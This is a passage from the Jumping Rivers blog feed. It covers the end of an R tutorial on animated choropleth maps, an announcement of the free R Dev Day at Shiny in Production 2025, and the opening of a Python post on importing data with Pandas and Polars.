&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_drop_geometry&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(n)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## # A tibble: 36 × 2
## country n
## &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;
## 1 French Guiana 1
## 2 Guadeloupe 1
## 3 Martinique 1
## 4 Aruba 8
## 5 Grenada 8
## 6 Netherlands Antilles 8
## 7 Suriname 8
## 8 Bahamas 10
## 9 Barbados 10
## 10 Belize 10
## # ℹ 26 more rows
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So 25 countries have 12 observations (the maximum), four each have 10
and 8, and three have just 1. To fill in these blanks, I’m going to use
{tidyr} to compute some mock values using the dataset mean for each
year. The countries with one observation would continue with one value
from 2002.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;completed &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(country &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; forcats&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fct_drop&lt;/span&gt;(country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;complete&lt;/span&gt;(year, country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(country, lifeExp, year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(lifeExp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(lifeExp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(lifeExp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;geoms &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(completed,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; geoms,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_as_sf&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_transform&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;EPSG:8858&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lifeExp)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Year: {closest_state}&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Life Expectancy&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_viridis_b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;inside&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position.inside &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.border &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;animation &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_states&lt;/span&gt;(states &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;animate&lt;/span&gt;(animation,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renderer &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gifski_renderer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;img/map2.gif&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/map2.gif" class="image-center" style="width: 450px;" alt = "Final animation with all countries."/&gt;
&lt;p&gt;So that is our final animated map. Of course, we could add more styling
or complexity - maybe in a future blog. If you want to learn more about
the topic, check out our &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet" rel="external"&gt;Spatial Data Analysis with R
course&lt;/a&gt;
or another Jumping Rivers blog, &lt;a href="https://www.jumpingrivers.com/blog/2021-thinking-about-maps-and-ice-cream/" rel="external"&gt;&lt;em&gt;Thinking About Maps and Ice
Cream&lt;/em&gt;&lt;/a&gt;
by Nicola Rennie.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/animated-map/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: R Dev Day</title><link>https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/</link><pubDate>Thu, 24 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Do you use R? Would you like to play a part in sustaining it? Find out about the R Dev Day that is returning as a satellite event to &lt;a href="https://shiny-in-production.jumpingrivers.com" rel="external"&gt;Shiny in Production 2025&lt;/a&gt;. This post will answer questions you may have, such as: &amp;ldquo;Do I need to be an R guru to participate?&amp;rdquo;, &amp;ldquo;What will I be expected to do?&amp;rdquo;, and &amp;ldquo;Is there a cost to attend?&amp;rdquo;. Hopefully by the end, you&amp;rsquo;ll be motivated to sign up!&lt;/p&gt;
&lt;h2 id="what-is-an-r-dev-day"&gt;What is an R Dev Day?&lt;/h2&gt;
&lt;p&gt;An R Dev Day is a hands-on collaborative event, where people work in small groups on contributions to base R or to infrastructure that supports such contributions from the community.&lt;/p&gt;
&lt;h2 id="what-do-you-mean-by-base-r"&gt;What do you mean by &lt;em&gt;base R&lt;/em&gt;?&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Base R&lt;/em&gt; is the colloquial term for everything that comes in the source distribution of R. From a user&amp;rsquo;s point of view, the main components are the &lt;a href="https://cran.r-project.org/manuals.html" rel="external"&gt;R manuals&lt;/a&gt; and 14 packages, including &lt;strong&gt;base&lt;/strong&gt;, &lt;strong&gt;datasets&lt;/strong&gt;, &lt;strong&gt;graphics&lt;/strong&gt;, and &lt;strong&gt;stats&lt;/strong&gt;. This codebase is maintained by the &lt;a href="https://www.r-project.org/contributors.html" rel="external"&gt;R Core Team&lt;/a&gt; with contributions from the wider community.&lt;/p&gt;
&lt;h2 id="what-do-you-mean-by-infrastructure"&gt;What do you mean by &lt;em&gt;infrastructure&lt;/em&gt;?&lt;/h2&gt;
&lt;p&gt;In this context, we&amp;rsquo;re using &lt;em&gt;infrastructure&lt;/em&gt; to refer to any documentation or tooling that facilitates or encourages contribution. Some examples are the &lt;a href="https://contributor.r-project.org/rdevguide/" rel="external"&gt;R Development Guide&lt;/a&gt; Quarto book, the &lt;a href="https://github.com/r-devel/r-dev-env" rel="external"&gt;R Dev Container&lt;/a&gt; containerised development environment, and the &lt;a href="https://contributor.r-project.org/translations-dashboard/" rel="external"&gt;Translations Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="do-i-need-to-be-an-r-guru-to-participate"&gt;Do I need to be an R guru to participate?&lt;/h2&gt;
&lt;p&gt;Come as you are! We aim to prepare a range of tasks suitable for people with different skills, so you can find something that matches your knowledge and experience. When you register, you can select the areas that you&amp;rsquo;re interested in contributing to and let us know if you have particular skills to offer.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t forget, you&amp;rsquo;ll be working in a small group, so you can benefit from each other&amp;rsquo;s expertise, and there will be experienced developers on hand to help out!&lt;/p&gt;
&lt;h2 id="what-will-i-be-expected-to-do"&gt;What will I be expected to do?&lt;/h2&gt;
&lt;p&gt;Tasks will be prepared in advance on the r-dev-day GitHub repo. You can check out some of the &lt;a href="https://github.com/r-devel/r-dev-day/issues?q=is%3Aissue%20state%3Aclosed" rel="external"&gt;closed issues&lt;/a&gt; from past R Dev Days. Typical tasks include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Contributing to fixing bugs in base R
&lt;ul&gt;
&lt;li&gt;Creating a reproducible example (&lt;em&gt;reprex&lt;/em&gt;), e.g., &lt;a href="https://github.com/r-devel/r-dev-day/issues/75" rel="external"&gt;Bug 17148: rasterImage shows incorrect image orientation&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Debugging an issue to find the root cause, e.g., &lt;a href="https://github.com/r-devel/bug-bbq/issues/1" rel="external"&gt;Bug 17616 - Anomaly with contrast functions&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Proposing a patch to fix an issue, e.g., &lt;a href="https://github.com/r-devel/r-dev-day/issues/77" rel="external"&gt;making a minor change that has already been suggested&lt;/a&gt;, &lt;a href="https://github.com/r-devel/r-dev-day/issues/32" rel="external"&gt;making larger changes to an R function after some analysis&lt;/a&gt;, or &lt;a href="https://github.com/r-devel/r-dev-day/issues/12" rel="external"&gt;updating the C code underlying an R function to fix a bug&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Adding a new section in the R Dev Guide, e.g., &lt;a href="https://github.com/r-devel/r-dev-day/issues/57" rel="external"&gt;Document how to make a feature request&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Translating messages, errors and warnings via the &lt;a href="https://translate.rx.studio/projects/r-project/" rel="external"&gt;Weblate&lt;/a&gt; online interface.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We aim to prepare tasks where you can make good progress and report back at the end of the event. If you can continue to contribute on an ad-hoc basis after the event, e.g., responding to a review of your contribution or taking on a new task, that is very much appreciated, but we understand if you can&amp;rsquo;t.&lt;/p&gt;
&lt;h2 id="when-and-where-is-the-r-dev-day"&gt;When and where is the R Dev Day?&lt;/h2&gt;
&lt;p&gt;R Dev Day @ SIP 2025 will take place on the Tuesday afternoon and Wednesday morning, before the Shiny in Production 2025 tutorials. It will be in the same building as the main conference.&lt;/p&gt;
&lt;h2 id="is-there-a-cost-to-attend"&gt;Is there a cost to attend?&lt;/h2&gt;
&lt;p&gt;No! The event is free to attend and open to people who are not attending Shiny in Production 2025. However, R Dev Day @ SIP 2025 participants receive 20% off
Shiny in Production 2025 registration, and early bird registration for the conference is open until Saturday 9 August, so we encourage you to register for both events while there is space left!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://pretix.eu/r-contributors/r-dev-day-sip-2025/" rel="external"&gt;Register for R Dev Day @ SIP 2025&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Importing Data with Python</title><link>https://www.jumpingrivers.com/blog/python-data-import/</link><pubDate>Thu, 17 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-data-import/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-data-import/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-data-import/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Importing data is a key step in the data science workflow. It also
carries a huge responsibility. How you import (or connect to) a dataset has
consequences for how you work with that data throughout a project,
because a Pandas DataFrame (say) requires Pandas-specific code.
Similarly, your data constrains your code - if it can fit in memory on a
single computer, the constraints are different than if your data is so
large that its storage must be distributed. Data-import is also a key place
where a data-project can go wrong. If you import a dataset without
validating that it contains sensible values, a nasty surprise may await
you…&lt;/p&gt;
&lt;p&gt;Python has wonderful libraries for data manipulation and analysis. You
can readily work with a variety of data sources, including those:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;that are too big to hold in memory;&lt;/li&gt;
&lt;li&gt;that are distributed across a network;&lt;/li&gt;
&lt;li&gt;that update rapidly;&lt;/li&gt;
&lt;li&gt;or that don’t easily conform to a tabular, relational form.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Python data stack is sufficiently mature that there are multiple
libraries for all of these settings. There are some moves to introduce a
&lt;a href="https://data-apis.org/blog/dataframe_standard_rfc/" rel="external"&gt;standardised syntax&lt;/a&gt; for some
data-frame functionality across libraries. At Jumping Rivers, we have a
number of
&lt;a href="https://www.jumpingrivers.com/training/all-courses/?languages=Python" rel="external"&gt;Python training courses&lt;/a&gt;,
and teach how to use Pandas, PySpark and NumPy, and how to work with
databases via SQL from Python.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-data-import"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="importing-into-memory"&gt;Importing into memory&lt;/h2&gt;
&lt;!--- In-memory: pandas vs polars --&gt;
&lt;p&gt;Firstly we will compare two in-memory data-frame packages:
&lt;a href="https://pandas.pydata.org/" rel="external"&gt;Pandas&lt;/a&gt; and &lt;a href="https://pola.rs/" rel="external"&gt;Polars&lt;/a&gt;. We
will work in a virtual environment (so that the packages installed are
handled independently of the system-wide Python; see our Barbie-themed
&lt;a href="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/" rel="external"&gt;blog post&lt;/a&gt;
on virtual environments).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Linux terminal commands]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create &amp;amp; activate a new virtual environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install pandas and polars into the environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install pandas polars
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will generate a simple dataset to import with the two packages.
&lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt; download numbers for a specific Python package
can be obtained using the
&lt;a href="https://pypi.org/project/pypistats/" rel="external"&gt;&lt;code&gt;pypistats&lt;/code&gt;&lt;/a&gt; package. After
installing it, we will pull out the number of downloads for the package
&lt;a href="https://docs.pytest.org/en/stable/" rel="external"&gt;&lt;code&gt;pytest&lt;/code&gt;&lt;/a&gt; - see our recent
&lt;a href="https://www.jumpingrivers.com/blog/?search=pytest" rel="external"&gt;blog posts&lt;/a&gt; for an
introduction to this testing library.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Linux terminal commands]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install pypistats&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install pypistats
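&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Make sure the output directory exists&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir -p data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Obtain download-statistics for `pytest` in tab-separated format&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pypistats python_minor -f tsv pytest &amp;gt; data/pytest-downloads.tsv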
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The structure of that file is straightforward. It records both the
number and the percentage of &lt;code&gt;pytest&lt;/code&gt; downloads for each minor
version of Python (“3.8”, “3.9” and so on) over the last 180 days (the
default time-span).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Linux terminal commands]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;head data/pytest-downloads.tsv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## &amp;quot;category&amp;quot; &amp;quot;percent&amp;quot; &amp;quot;downloads&amp;quot;
## &amp;quot;3.11&amp;quot; &amp;quot;23.40%&amp;quot; 282,343,944
## &amp;quot;3.9&amp;quot; &amp;quot;18.78%&amp;quot; 226,548,604
## &amp;quot;3.10&amp;quot; &amp;quot;18.74%&amp;quot; 226,155,405
## &amp;quot;3.12&amp;quot; &amp;quot;15.48%&amp;quot; 186,819,921
## &amp;quot;null&amp;quot; &amp;quot;8.41%&amp;quot; 101,489,156
## &amp;quot;3.8&amp;quot; &amp;quot;6.13%&amp;quot; 73,965,471
## &amp;quot;3.13&amp;quot; &amp;quot;4.91%&amp;quot; 59,253,846
## &amp;quot;3.7&amp;quot; &amp;quot;3.36%&amp;quot; 40,551,618
## &amp;quot;3.6&amp;quot; &amp;quot;0.54%&amp;quot; 6,546,017
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it should be trivial to import it into Python using either Pandas or
Polars.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;data/pytest-downloads.tsv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
